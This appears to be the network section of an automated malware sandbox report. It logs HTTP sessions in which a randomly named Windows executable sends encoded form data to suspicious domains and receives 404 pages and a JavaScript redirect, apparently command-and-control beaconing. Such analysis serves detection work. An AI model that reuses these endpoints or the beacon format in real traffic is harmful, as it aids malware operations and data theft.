                                                                                      Data Ascii: <!DOCTYPE html><html><head> <title>404 Error</title></head><body style="background:white;"> <style type="text/css"> .speachbubble { position: relative; width: 250px; height: 105px; padding: 0px; background: black; background: linear-gradient(to bottom, rgba(135,135,135,1) 0%,rgba(0,0,0,1) 100%); border-radius: 8px; margin:auto; margin-top:100px;}.speachbubble:after { content: ""; position: absolute; bottom: -18px; left: 102px; border-style: solid; border-width: 18px 21px 0; border-color: black transparent; display: block; width: 0; z-index: 1;}.speachbubble span { display:block; margin:auto; text-align:center; font:72px arial; color:white; padding-top:10px; text-shadow: 4px 4px 2px rgba(0, 0, 0, .3);}.message { font:24px arial; color:black; text-align:center; margin-top:40px; text-shadow: 2
                                                                                      Nov 13, 2024 09:26:44.568779945 CET185INData Raw: 70 78 20 32 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 32 29 3b 0d 0a 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 20 0d 0a 0d 0a 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 65 61 63 68 62 75 62 62 6c 65 22 3e 3c 73 70 61 6e 3e 34
                                                                                      Data Ascii: px 2px 2px rgba(0, 0, 0, .2);}</style> <div class="speachbubble"><span>404</span></div><div class="message">Error: 404 - File Not Found</div> </body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.4588173.33.130.190802800C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 13, 2024 09:26:59.698765039 CET798OUTPOST /usv6/ HTTP/1.1
                                                                                      Host: www.binacamasala.com
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Origin: http://www.binacamasala.com
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Length: 199
                                                                                      Referer: http://www.binacamasala.com/usv6/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Data Raw: 72 50 3d 65 69 72 75 41 33 31 33 64 63 77 47 31 5a 48 55 42 32 2b 36 78 37 6d 4e 42 34 35 36 69 54 76 53 4a 78 78 35 76 65 75 58 66 77 38 59 4a 46 2f 43 32 54 6f 78 30 4d 37 2f 67 6e 37 48 4f 2b 79 71 57 43 78 53 37 47 44 36 6d 37 47 79 4f 68 42 36 33 73 68 7a 74 37 63 39 37 33 70 6f 6f 53 71 6b 72 67 43 37 52 62 73 62 78 6a 63 4f 33 6b 68 75 34 65 4b 56 75 56 4b 5a 6f 79 65 34 6c 2f 4a 6f 52 30 51 6d 73 74 36 56 66 2f 48 66 6f 56 72 61 56 66 43 6d 58 66 66 74 39 65 42 64 56 44 6f 4e 4c 48 4e 2b 59 68 69 38 72 51 59 7a 33 5a 39 44 73 5a 43 4c 39 76 63 49 69 42 65 52 7a 4c 4b 57 48 41 3d 3d
                                                                                      Data Ascii: rP=eiruA313dcwG1ZHUB2+6x7mNB456iTvSJxx5veuXfw8YJF/C2Tox0M7/gn7HO+yqWCxS7GD6m7GyOhB63shzt7c973pooSqkrgC7RbsbxjcO3khu4eKVuVKZoye4l/JoR0Qmst6Vf/HfoVraVfCmXfft9eBdVDoNLHN+Yhi8rQYz3Z9DsZCL9vcIiBeRzLKWHA==


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      2192.168.2.4588183.33.130.190802800C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 13, 2024 09:27:02.237179041 CET818OUTPOST /usv6/ HTTP/1.1
                                                                                      Host: www.binacamasala.com
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Origin: http://www.binacamasala.com
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Length: 219
                                                                                      Referer: http://www.binacamasala.com/usv6/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Data Raw: 72 50 3d 65 69 72 75 41 33 31 33 64 63 77 47 30 34 33 55 4e 78 43 36 67 62 6d 4d 45 34 35 36 6f 7a 76 57 4a 78 74 35 76 66 72 50 66 6d 45 59 49 6e 6e 43 33 53 6f 78 31 4d 37 2f 76 48 37 43 41 65 79 68 57 43 4e 30 37 44 72 36 6d 36 6d 79 4f 6c 4e 36 30 62 31 77 73 72 63 2f 30 58 70 51 6d 79 71 6b 72 67 43 37 52 62 6f 68 78 6a 45 4f 33 58 70 75 71 76 4b 55 79 46 4b 61 68 53 65 34 68 2f 4a 73 52 30 51 59 73 70 37 77 66 35 62 66 6f 55 62 61 56 4f 43 6c 65 66 66 72 67 4f 42 44 61 69 4a 36 46 57 38 68 66 44 4f 42 74 7a 70 58 2f 2f 77 5a 39 6f 6a 63 76 76 34 37 2f 47 58 6c 2b 49 33 66 63 49 72 66 51 68 55 66 44 71 2f 43 4d 32 49 5a 4f 66 4b 45 6f 48 30 3d
                                                                                      Data Ascii: rP=eiruA313dcwG043UNxC6gbmME456ozvWJxt5vfrPfmEYInnC3Sox1M7/vH7CAeyhWCN07Dr6m6myOlN60b1wsrc/0XpQmyqkrgC7RbohxjEO3XpuqvKUyFKahSe4h/JsR0QYsp7wf5bfoUbaVOCleffrgOBDaiJ6FW8hfDOBtzpX//wZ9ojcvv47/GXl+I3fcIrfQhUfDq/CM2IZOfKEoH0=


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      3192.168.2.4588193.33.130.190802800C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 13, 2024 09:27:04.784485102 CET10900OUTPOST /usv6/ HTTP/1.1
                                                                                      Host: www.binacamasala.com
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Origin: http://www.binacamasala.com
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Length: 10299
                                                                                      Referer: http://www.binacamasala.com/usv6/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Data Raw: 72 50 3d 65 69 72 75 41 33 31 33 64 63 77 47 30 34 33 55 4e 78 43 36 67 62 6d 4d 45 34 35 36 6f 7a 76 57 4a 78 74 35 76 66 72 50 66 6d 4d 59 49 57 48 43 32 78 41 78 76 4d 37 2f 6d 6e 37 44 41 65 79 34 57 43 6c 34 37 44 6e 4d 6d 2f 69 79 4e 47 46 36 78 75 5a 77 6d 72 63 2f 73 6e 70 72 6f 53 71 78 72 67 53 2f 52 62 59 68 78 6a 45 4f 33 52 4e 75 39 75 4b 55 77 46 4b 5a 6f 79 65 38 6c 2f 4a 55 52 30 49 49 73 70 76 4b 66 4b 44 66 6f 30 4c 61 47 73 36 6c 63 2f 66 70 68 4f 41 51 61 69 46 6c 46 53 6b 74 66 48 4f 76 74 30 5a 58 36 62 56 74 67 37 36 48 35 63 6f 30 68 6b 54 34 34 34 76 42 45 36 62 33 57 54 4e 45 62 34 50 65 43 6c 5a 52 65 4d 71 77 33 67 30 46 31 75 31 75 6c 6b 4a 6a 34 6e 74 4d 5a 7a 71 64 43 4f 7a 4b 4a 70 38 77 62 6f 6c 47 37 63 50 4b 30 39 73 6b 63 7a 36 59 62 57 65 58 2f 72 79 39 4f 73 34 67 59 55 59 35 6a 61 78 54 68 5a 71 58 58 48 51 61 4d 54 52 36 6d 42 64 32 47 42 57 45 67 6b 62 63 68 45 72 4c 7a 75 45 6f 33 6e 79 75 61 4b 61 59 65 6f 37 7a 73 69 56 33 53 66 53 63 31 77 4d 64 73 79 42 [TRUNCATED]
                                                                                      Data Ascii: rP=eiruA313dcwG043UNxC6gbmME456ozvWJxt5vfrPfmMYIWHC2xAxvM7/mn7DAey4WCl47DnMm/iyNGF6xuZwmrc/snproSqxrgS/RbYhxjEO3RNu9uKUwFKZoye8l/JUR0IIspvKfKDfo0LaGs6lc/fphOAQaiFlFSktfHOvt0ZX6bVtg76H5co0hkT444vBE6b3WTNEb4PeClZReMqw3g0F1u1ulkJj4ntMZzqdCOzKJp8wbolG7cPK09skcz6YbWeX/ry9Os4gYUY5jaxThZqXXHQaMTR6mBd2GBWEgkbchErLzuEo3nyuaKaYeo7zsiV3SfSc1wMdsyBIphx7GrsbSuoFl0CAYcr825dggSLgKbbjqNZjqZbGHt04cdDiVP2MAyY+S0DLCVJD2sMtHgH9oDzX+73ot6V6QhNTIQltTifcvCPUfv1G+SS5ZsYjW9tjTEWhIHjSQiojewm2hnE+ClrcXO1D94iG/gVZFoulBsWQ3ByZJb0hA/8AKAnqGKI3dYTWsufRCXMwE4UdtqHnUVQ/jE/mSRSUJ2pnnPh3icrclfQbXD69Hwjf8nHreggz7L/CoTJ2h0Vw7aP43Ag5F3tAnFgj2SIFefS4Og8GmUjlappPeVevOSR9PSLMcFmfZnRq9N3Y88jHNzCwMEfrazdq02e07MPJ3n8TfN/87eW9fa2Hg9nutiEpQDOLBu6cEFpMiHR6Rx5b4P7qJEm9kzxSAXVWfWa+Txc5Pg3c0r3Guv79kaQai/k3R0xvYJ2xUR5bpnS+2069CIud1NwWqERxWNArz2g90pX0WG4n+oekVtUpWWafYSgYtU11BTj+VCUjAru0YLqoeBBt/HNhDMnH6RcHzBEkoGWQfSYDEY6LL8r5ILmtA8JqGnH7utd+KudqUZvJsuRM4TmS5bLNKTEJUtjg4D8LzuFuwK8WolQjwnUE5muB6CeQC2vQ47SWPEDbm1yHWbn4KC7F3ZtxgGbeWvhagxEF8XUZOrKFVY0Li [TRUNCATED]


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      4192.168.2.4588203.33.130.190802800C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 13, 2024 09:27:07.329001904 CET530OUTGET /usv6/?rP=TgDODAIJaOl5jtT4JRfI9OPwBKlUmFbaFilQ+MjMe2d3S0GP4FMVsOvduy7NJ4+NeTwYvTqThdXRP3V3mN8pkp0x831zohGfqDiCdJRchCUQ1npuqurwuCk=&2p2h=vzYT2lDhJTZ0Ql HTTP/1.1
                                                                                      Host: www.binacamasala.com
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Nov 13, 2024 09:27:07.950499058 CET398INHTTP/1.1 200 OK
                                                                                      Server: openresty
                                                                                      Date: Wed, 13 Nov 2024 08:27:07 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 258
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 72 50 3d 54 67 44 4f 44 41 49 4a 61 4f 6c 35 6a 74 54 34 4a 52 66 49 39 4f 50 77 42 4b 6c 55 6d 46 62 61 46 69 6c 51 2b 4d 6a 4d 65 32 64 33 53 30 47 50 34 46 4d 56 73 4f 76 64 75 79 37 4e 4a 34 2b 4e 65 54 77 59 76 54 71 54 68 64 58 52 50 33 56 33 6d 4e 38 70 6b 70 30 78 38 33 31 7a 6f 68 47 66 71 44 69 43 64 4a 52 63 68 43 55 51 31 6e 70 75 71 75 72 77 75 43 6b 3d 26 32 70 32 68 3d 76 7a 59 54 32 6c 44 68 4a 54 5a 30 51 6c 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?rP=TgDODAIJaOl5jtT4JRfI9OPwBKlUmFbaFilQ+MjMe2d3S0GP4FMVsOvduy7NJ4+NeTwYvTqThdXRP3V3mN8pkp0x831zohGfqDiCdJRchCUQ1npuqurwuCk=&2p2h=vzYT2lDhJTZ0Ql"}</script></head></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      5192.168.2.458822194.58.112.174802800C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 13, 2024 09:27:13.340818882 CET798OUTPOST /xprp/ HTTP/1.1
                                                                                      Host: www.marketplacer.top
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Origin: http://www.marketplacer.top
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Length: 199
                                                                                      Referer: http://www.marketplacer.top/xprp/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Data Raw: 72 50 3d 59 76 34 72 5a 41 4e 58 7a 58 79 69 39 76 76 45 57 72 4f 49 49 54 57 30 48 41 6c 47 41 78 73 32 61 6c 4d 41 56 59 6f 34 4b 71 7a 52 68 4b 49 54 55 5a 2b 33 76 43 51 6d 63 65 4f 46 7a 35 73 67 4f 43 61 64 77 49 73 31 78 5a 32 64 37 4f 45 45 5a 48 67 76 76 59 58 46 64 6a 65 77 44 39 77 6e 59 45 67 66 73 65 67 2b 76 2b 31 30 6f 6e 6f 52 70 4a 4c 32 46 4e 68 52 4c 2f 47 34 4a 41 34 4c 42 4c 64 35 49 39 39 65 48 44 4e 77 71 51 73 32 70 76 32 75 51 59 32 79 75 53 52 68 43 2f 46 53 52 33 76 51 2f 74 76 54 71 4f 46 4f 75 69 77 59 76 66 4a 30 47 71 6a 79 71 32 54 4c 7a 39 64 77 70 51 3d 3d
                                                                                      Data Ascii: rP=Yv4rZANXzXyi9vvEWrOIITW0HAlGAxs2alMAVYo4KqzRhKITUZ+3vCQmceOFz5sgOCadwIs1xZ2d7OEEZHgvvYXFdjewD9wnYEgfseg+v+10onoRpJL2FNhRL/G4JA4LBLd5I99eHDNwqQs2pv2uQY2yuSRhC/FSR3vQ/tvTqOFOuiwYvfJ0Gqjyq2TLz9dwpQ==
                                                                                      Nov 13, 2024 09:27:14.243679047 CET1236INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Wed, 13 Nov 2024 08:27:14 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Content-Encoding: gzip
                                                                                      Data Raw: 64 31 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 04 b6 45 52 79 38 fd 94 47 01 39 2d 0a 45 21 86 cb 11 b9 e6 72 97 dd 1d 4a a6 6d 01 89 9d 34 09 62 c4 68 1a a0 40 d0 a2 2f 14 fd 54 40 7e a8 51 fc 50 fe c2 f2 1f f5 dc 3b bb cb 25 45 ca 8f 38 45 05 48 22 67 67 ee dc b9 f7 dc 73 ef cc 6c fd 74 27 74 f5 78 a8 44 4f 0f fc 66 9d fe 0a d7 97 71 dc 28 79 71 4b 76 e4 50 7b 3b aa 24 7c 19 74 1b a5 68 54 42 1f 25 3b cd fa 40 69 29 dc 9e 8c 62 a5 1b a5 f7 2f fd c2 3a 87 67 dc 1a c8 81 6a 94 86 32 ea 7b 41 b7 24 dc 30 d0 2a 40 a7 48 75 a3 91 15 41 e6 6c cf 1d 4f ed 0e c3 48 17 ba ee 7a 1d dd 6b 74 d4 8e e7 2a 8b bf d4 bc c0 d3 9e f4 ad d8 95 be 6a ac 42 84 f6 b4 af 9a bb bb bb f6 00 73 29 3d f4 a5 ab 22 5b 87 c3 ba 63 9e d5 7d 2f e8 8b 48 f9 8d 52 ac c7 be 8a 7b 4a 61 9a 81 ea 78 b2 51 92 be 5f 12 bd 48 6d e7 ca b2 72 96 1c e9 d0 76 e3 18 53 4c c7 7b 58 46 d6 7b 5b 42 af 30 b0 f1 67 7d b5 24 c8 7e 30 d7 40 76 95 73 c5 e2 8e cd 7a ec 46 de 50 37 9d 33 f5 d3 9b [TRUNCATED]
                                                                                      Data Ascii: d1cZko_1fQRERy8G9-E!rJm4bh@/T@~QP;%E8EH"ggslt'txDOfq(yqKvP{;$|thTB%;@i)b/:gj2{A$0*@HuAlOHzkt*jBs)="[c}/HR{JaxQ_HmrvSL{XF{[B0g}$~0@vszFP73o^|gS^wmIeG4(pSBRa"|tomkr\_EQ=X8r x%HoY/GZAEc;mk_Ekh6Sm^jHLb,j&oQr<w#|N>C%w}z|w%h:m"fXi=/8F`]P%8ZT<KAj#P4=hrf:tUFBS8[N^kk=uV:?iuj9XL%[mvA1B}UoG+}p3&.[v{uChi>~*pjZ@~iv8 b(;rGmB/vr'E"5i(rU#S5I!$z)p3utrjYAB9 |\JzPAY'/4;@L>M&Mn~e(ab8$&n*"tR\,}oCQMRA [TRUNCATED]
                                                                                      Nov 13, 2024 09:27:14.243720055 CET1236INData Raw: a0 d3 8f f4 7d 3a eb d4 fd 05 82 f5 2d d4 55 5d 2f 68 f9 6a 5b 5b 26 b6 31 a1 8e c2 a0 fb 64 a7 80 8d 01 77 97 92 d9 3f 81 5e 64 2e 98 f7 71 72 0f 38 63 09 33 3c 3b 1f bc c6 38 f1 a8 6d 5c 9e 6b d2 0e c1 78 03 e4 ca 40 41 ee 9f 91 01 ef 4f 7e 8f
                                                                                      Data Ascii: }:-U]/hj[[&1dw?^d.qr8c3<;8m\kx@AO~y<2^zgI\w@)9s@JQL7]]<d%f8> `pr`Ln-Y`.O1`e!U@/rbaa6v=r{Vt<nX1-
                                                                                      Nov 13, 2024 09:27:14.243753910 CET424INData Raw: 13 2f 11 d2 0d 6c e1 2a e4 29 2f 13 16 0e 2c 1c da 2f 7a 7e d2 c1 7d 7a f9 91 5d 8d 40 f1 8e d4 b2 42 7f aa d7 4e 89 c2 8f b7 2d 2a 82 da 6d be ef c0 51 27 0e 27 ab 62 b6 13 f5 8f 14 f6 f8 c1 da cc e0 bd 53 33 5f a7 b2 70 54 da f2 3a 0b e5 ec c8
                                                                                      Data Ascii: /l*)/,/z~}z]@BN-*mQ''bS3_pT:Hb\8;RxC0z+,:;iFdx8WAWr"i4+obMX6_yoR^/WEBMgn4o9++=X-0.=yY/>#)EF^Qg`oF~4Xu#
                                                                                      Nov 13, 2024 09:27:14.243783951 CET646INData Raw: 5a f4 0d 61 59 9b 01 82 26 9b 53 8e 7c d3 5c 56 97 85 17 4c 55 e1 bb c3 f5 b9 0e 17 44 d9 0b 70 75 76 09 a3 60 b4 5c 1c a9 66 fc 41 ae 2e 42 81 ab ae 7c cd 15 5a f4 f5 cd 97 ac f3 5b 55 fb ec 07 36 7f af 6e 7e f8 41 bc 75 16 b6 60 6c e4 42 0d 2b
                                                                                      Data Ascii: ZaY&S|\VLUDpuv`\fA.B|Z[U6n~Au`lB+K'IplZ,}/i# 7Zeq#wElBPj!WhW%' 7HBQhEd}l-G'f,3@4P_JOR1f-S_]7G!ih,


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      6192.168.2.458838194.58.112.174802800C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 13, 2024 09:27:15.884852886 CET818OUTPOST /xprp/ HTTP/1.1
                                                                                      Host: www.marketplacer.top
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Origin: http://www.marketplacer.top
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Length: 219
                                                                                      Referer: http://www.marketplacer.top/xprp/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Data Raw: 72 50 3d 59 76 34 72 5a 41 4e 58 7a 58 79 69 38 50 66 45 51 49 6d 49 44 54 57 31 43 41 6c 47 4f 68 73 79 61 6c 51 41 56 5a 38 6f 4b 34 58 52 68 75 4d 54 56 59 2b 33 71 43 51 6d 45 75 4f 45 75 4a 73 37 4f 43 58 71 77 49 67 31 78 61 4b 64 37 4c 34 45 59 31 49 6f 75 49 58 39 56 44 65 49 4d 64 77 6e 59 45 67 66 73 61 77 41 76 2b 74 30 6f 54 73 52 72 6f 4c 35 47 4e 68 53 43 66 47 34 65 77 34 50 42 4c 64 62 49 2f 4a 30 48 47 42 77 71 55 6f 32 75 39 65 78 5a 59 32 30 67 79 51 70 52 73 38 57 63 47 50 5a 79 39 44 66 71 63 46 64 6d 45 39 43 2b 75 6f 6a 55 71 48 42 33 78 61 2f 2b 2b 67 35 79 59 41 51 78 47 37 39 6c 57 32 55 5a 53 66 39 53 53 31 7a 43 41 55 3d
                                                                                      Data Ascii: rP=Yv4rZANXzXyi8PfEQImIDTW1CAlGOhsyalQAVZ8oK4XRhuMTVY+3qCQmEuOEuJs7OCXqwIg1xaKd7L4EY1IouIX9VDeIMdwnYEgfsawAv+t0oTsRroL5GNhSCfG4ew4PBLdbI/J0HGBwqUo2u9exZY20gyQpRs8WcGPZy9DfqcFdmE9C+uojUqHB3xa/++g5yYAQxG79lW2UZSf9SS1zCAU=
                                                                                      Nov 13, 2024 09:27:16.921195984 CET1236INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Wed, 13 Nov 2024 08:27:16 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Content-Encoding: gzip
                                                                                      Data Raw: 64 31 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 04 b6 45 52 79 38 fd 94 47 01 39 2d 0a 45 21 86 cb 11 b9 e6 72 97 dd 1d 4a a6 6d 01 89 9d 34 09 62 c4 68 1a a0 40 d0 a2 2f 14 fd 54 40 7e a8 51 fc 50 fe c2 f2 1f f5 dc 3b bb cb 25 45 ca 8f 38 45 05 48 22 67 67 ee dc b9 f7 dc 73 ef cc 6c fd 74 27 74 f5 78 a8 44 4f 0f fc 66 9d fe 0a d7 97 71 dc 28 79 71 4b 76 e4 50 7b 3b aa 24 7c 19 74 1b a5 68 54 42 1f 25 3b cd fa 40 69 29 dc 9e 8c 62 a5 1b a5 f7 2f fd c2 3a 87 67 dc 1a c8 81 6a 94 86 32 ea 7b 41 b7 24 dc 30 d0 2a 40 a7 48 75 a3 91 15 41 e6 6c cf 1d 4f ed 0e c3 48 17 ba ee 7a 1d dd 6b 74 d4 8e e7 2a 8b bf d4 bc c0 d3 9e f4 ad d8 95 be 6a ac 42 84 f6 b4 af 9a bb bb bb f6 00 73 29 3d f4 a5 ab 22 5b 87 c3 ba 63 9e d5 7d 2f e8 8b 48 f9 8d 52 ac c7 be 8a 7b 4a 61 9a 81 ea 78 b2 51 92 be 5f 12 bd 48 6d e7 ca b2 72 96 1c e9 d0 76 e3 18 53 4c c7 7b 58 46 d6 7b 5b 42 af 30 b0 f1 67 7d b5 24 c8 7e 30 d7 40 76 95 73 c5 e2 8e cd 7a ec 46 de 50 37 9d 33 f5 d3 9b [TRUNCATED]
                                                                                      Data Ascii: d1cZko_1fQRERy8G9-E!rJm4bh@/T@~QP;%E8EH"ggslt'txDOfq(yqKvP{;$|thTB%;@i)b/:gj2{A$0*@HuAlOHzkt*jBs)="[c}/HR{JaxQ_HmrvSL{XF{[B0g}$~0@vszFP73o^|gS^wmIeG4(pSBRa"|tomkr\_EQ=X8r x%HoY/GZAEc;mk_Ekh6Sm^jHLb,j&oQr<w#|N>C%w}z|w%h:m"fXi=/8F`]P%8ZT<KAj#P4=hrf:tUFBS8[N^kk=uV:?iuj9XL%[mvA1B}UoG+}p3&.[v{uChi>~*pjZ@~iv8 b(;rGmB/vr'E"5i(rU#S5I!$z)p3utrjYAB9 |\JzPAY'/4;@L>M&Mn~e(ab8$&n*"tR\,}oCQMRA [TRUNCATED]
                                                                                      Nov 13, 2024 09:27:16.921237946 CET212INData Raw: a0 d3 8f f4 7d 3a eb d4 fd 05 82 f5 2d d4 55 5d 2f 68 f9 6a 5b 5b 26 b6 31 a1 8e c2 a0 fb 64 a7 80 8d 01 77 97 92 d9 3f 81 5e 64 2e 98 f7 71 72 0f 38 63 09 33 3c 3b 1f bc c6 38 f1 a8 6d 5c 9e 6b d2 0e c1 78 03 e4 ca 40 41 ee 9f 91 01 ef 4f 7e 8f
                                                                                      Data Ascii: }:-U]/hj[[&1dw?^d.qr8c3<;8m\kx@AO~y<2^zgI\w@)9s@JQL7]]<d%f8> `pr`Ln-Y`.O1`e!U@/rbaa6
                                                                                      Nov 13, 2024 09:27:16.921266079 CET1236INData Raw: 76 f1 3d aa 72 7f 92 05 cf b9 e7 a4 85 fe 7b f2 09 56 74 90 3c 80 6e 87 58 08 16 31 b9 2d a8 c0 49 1b 50 f2 70 60 a6 0f 28 7b d2 82 0f f0 ff 01 ad 31 4b ab b0 c0 e4 33 b6 02 c7 32 ac 94 7c 0f b3 a0 ef 4f bf de 7f 61 6e f2 06 83 f1 a4 d5 fe 69 f2
                                                                                      Data Ascii: v=r{Vt<nX1-IPp`({1K32|Oanie{tLB#tP.g74TE0>$h_X3,%0BJ 0lElr`Fs]y:4{B,sjr`.viuqH[-9G8+3
                                                                                      Nov 13, 2024 09:27:16.921298027 CET212INData Raw: 29 45 46 5e a7 51 16 67 0d 10 8c f3 8e af 60 6f 46 7e c1 f7 85 8f e4 99 34 58 0a ee 75 23 9c 10 a9 b7 7c 45 ce ae 94 4d 87 72 c1 bd 34 8c 8e e5 a0 74 61 18 6e 52 d2 31 f1 1b e3 4b b2 fb 2e 2e 47 2b 65 ea 57 ae 6e be b4 35 d5 d0 08 b4 71 ff 86 e1
                                                                                      Data Ascii: )EF^Qg`oF~4Xu#|EMr4tanR1K..G+eWn5qlgM8m~=<=y3{6}*U^u}dW/F2TWR;fn%W6c7Mky9yUs%,]YYN3fzRReG&c
                                                                                      Nov 13, 2024 09:27:16.921334982 CET646INData Raw: 5a f4 0d 61 59 9b 01 82 26 9b 53 8e 7c d3 5c 56 97 85 17 4c 55 e1 bb c3 f5 b9 0e 17 44 d9 0b 70 75 76 09 a3 60 b4 5c 1c a9 66 fc 41 ae 2e 42 81 ab ae 7c cd 15 5a f4 f5 cd 97 ac f3 5b 55 fb ec 07 36 7f af 6e 7e f8 41 bc 75 16 b6 60 6c e4 42 0d 2b
                                                                                      Data Ascii: ZaY&S|\VLUDpuv`\fA.B|Z[U6n~Au`lB+K'IplZ,}/i# 7Zeq#wElBPj!WhW%' 7HBQhEd}l-G'f,3@4P_JOR1f-S_]7G!ih,
